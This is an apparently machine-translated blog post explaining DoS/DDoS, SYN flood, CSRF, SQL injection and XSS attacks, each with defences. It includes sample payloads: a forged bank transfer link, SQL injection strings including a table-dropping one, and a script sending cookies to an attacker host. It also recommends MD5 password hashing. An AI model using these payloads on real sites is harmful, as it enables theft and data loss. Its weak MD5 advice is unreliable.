Several web attacks

Copyright: https://blog.csdn.net/zhydream77/article/details/85694614

A, Dos attacks (Denial of Service attack)

　　Is a for server enables the server becomes inert and attack method. Sometimes called service stops attacks or denial of service attacks . The principle is to send a large number of legitimate requests to the server, the server can not tell these requests is a normal request or a request to attack, it will accept all. A flood of requests can cause the server to stop working or deny state services. This is the Dos attack.

Two, DDOS attacks

concept

• Distributed denial of service attacks (Distributed Denial of Service), it simply is to send a large number of requests is to make the server to its knees. DDos attacks, the popular understanding of the DOS attack can be based on, DOS is singled out, and ddos is gang fights , because lethality development of modern technology, dos attack is reduced, so there DDOS, attack resorted to public networks, will a large number of computer equipment together, to attack one or more targets.

Case

• SYN Flood, briefly about the three-way handshake tcp client server request, a request to establish a connection, then the server returns a message indicating that the request to be accepted, then the client will return a message, and finally establish a connection. So if there is such a situation, the attacker forged ip address, sent a message to the server requests a connection, the server receives this time, according to the rules tcp three-way handshake, the server should respond with a message, but this is a fake ip, who does respond to the message, the second handshake errors, the third time naturally can not be successfully carried out, this time the client sends the server does not receive the third handshake packets, again repeated second handshake operation. If the attacker forged a lot of ip addresses and sends a request, this time the server will maintain a very large semi-connected waiting list, taking up a lot of resources, the last server to its knees.
• CC attack, attack at the application layer protocol http simulate normal user sends a large number of requests until the site denial of service so far.

The reason being attacked

• Server bandwidth is insufficient, can not block the attack traffic attacker

prevention

• The most direct way to increase bandwidth. But the attacker attacks around the computer, he will not spend a lot of money bandwidth, but for servers, bandwidth is very expensive.
• Cloud service providers have their own set of complete DDoS solutions, and can provide a wealth of bandwidth resources. ------ If it is recommended to use high cloud Ali proof.

 

Three, CSRF cross-site request forgery (CSRF, Cross-Site Request Forgeries )

concept

• Stands for CSRF (cross site request forgery), refers to access by masquerading as a trusted user, the popular talk is to say I visited the site A, then the cookie from the browser, and then I visit a rogue website , accidentally ordered a rogue website link (a request to send), this time the rogue site use my identity for a for a visit. It refers to the attacker already set the trap, forcing unintended personal information on the user authentication has been completed or set to update some state information. A passive attack. This simply means that more attackers stole your name, in your name to send the request.

case

　A CSRF simplest example is the user logged into the site A A transfer of 1,000 dollars in the virtual account, user A cookie is generated in the local site A, the user A in the absence of closed sites A, B have visited a malicious Web site , B contains a malicious Web site a Web site request code, the use of a local cookie authenticated identity to send a request to the ED site a, then you will find yourself in the 1000 accounts for site a and less. This is the basic of CSRF attacks.

• This example may not exist in reality, but the mode of attack is the same. For example, I logged A bank's website, and then I visited the roommate of a rogue website, then a link inside  www.A.com/transfer?account=666&money=10000, so this time I'll probably to account for the 666 people who turned 1w soft sister coins
• Note that this attack is not necessarily I ordered this link, which can also be the site of some resources requests to transfer this link, for example, a <img src = " http://www.A.com/transfer?account= Money = 10000 & 666 ">

The reason being attacked

• The user cookie is stored locally, attacker uses to authenticate the user's cookie, then the user makes a request forgery

prevention

• The reason being attacked because an attacker using a cookie stored in the browser for user authentication, so if we do not have to verify that no cookie can be prevented. So we can token (not stored in the browser) used for authentication.
• By referer recognition, HTTP Referer is part of the header, and when the browser sends a request to the web server, usually bring Referer, I tell the server which page links from over, this server group can get some information for processing. So this is the case, we must be logged in bank A website to carry out the transfer.

 

Four, SOL injection attacks

concept

Refers to sending a malicious web connection through a database of SQL statements generated by the attack, resulting in security risks and threats to the site, you can verify the cause escape or private information leaks and other hazards. SQL injection principle by the omission of the SQL statement is called, inject malicious SQL statements.

Case

• ' or '1'= '1. This is the most common sql injection attack, when we lose as a user name jiajun, then the password is entered, such as 'or '1'= '1when we query the user name and password are correct time, would have to do is select * from user where username='' and password='', after parameter stitching, will execute sql statement  select * from user where username='jaijun' and password=' ' or ' 1'='1 'this time 1 = 1 is established, naturally skipped verified.
• However, if another serious point, such as a password is entered ';drop table user;--, then the sql command select * from user where username='jiajun' and password='';drop table user;--' this time we just put this table to delete

The reason being attacked

• sql statement forgery parameters, then the formation of destructive sql statement after the parameters splicing, leading to database attacks

prevention

• In java, we can use a prepared statement (PreparedStatement), so even if we use the sql statement faked parameters to the server when this fake sql statement parameters are simply characters, and can not play a role in the attack.
• Many orm framework can already be escaped parameters
• Prepare for the worst, even if they are 'drag library' ( 'Tuoku, database leak'). Password should not be stored in plain text in the database can be encrypted using md5 password, in order to increase the cost of cracks, so that the salt (database stores user name, salt (random characters long), the ciphertext md5) mode can be employed.

Five, XSS attacks (Cross-Site scripting)

concept

Cross-site scripting attacks, refers to running illegal HTML tags or javascript inside by a registered site user's browser, so as to achieve the purpose of attack, such as steal the user's cookie, change the DOM structure of the page, redirect to other pages , etc. .

case

• For example, I wrote a blog site, then the attacker posted an article on it, the content is so  <script>window.open(“www.gongji.com?param=”+document.cookie)</script>, if I do not have his information processed, stored directly in the database, then the next time when other users access to his this article, from the database server to read and respond to the client, the browser executes the script, then put the user's cookie is sent to the attacker's server.

The reason being attacked

• User-entered data into a code example above <script>, there should be just what the code string.

prevention

• The input data escaping, for example, say <escaped as & lt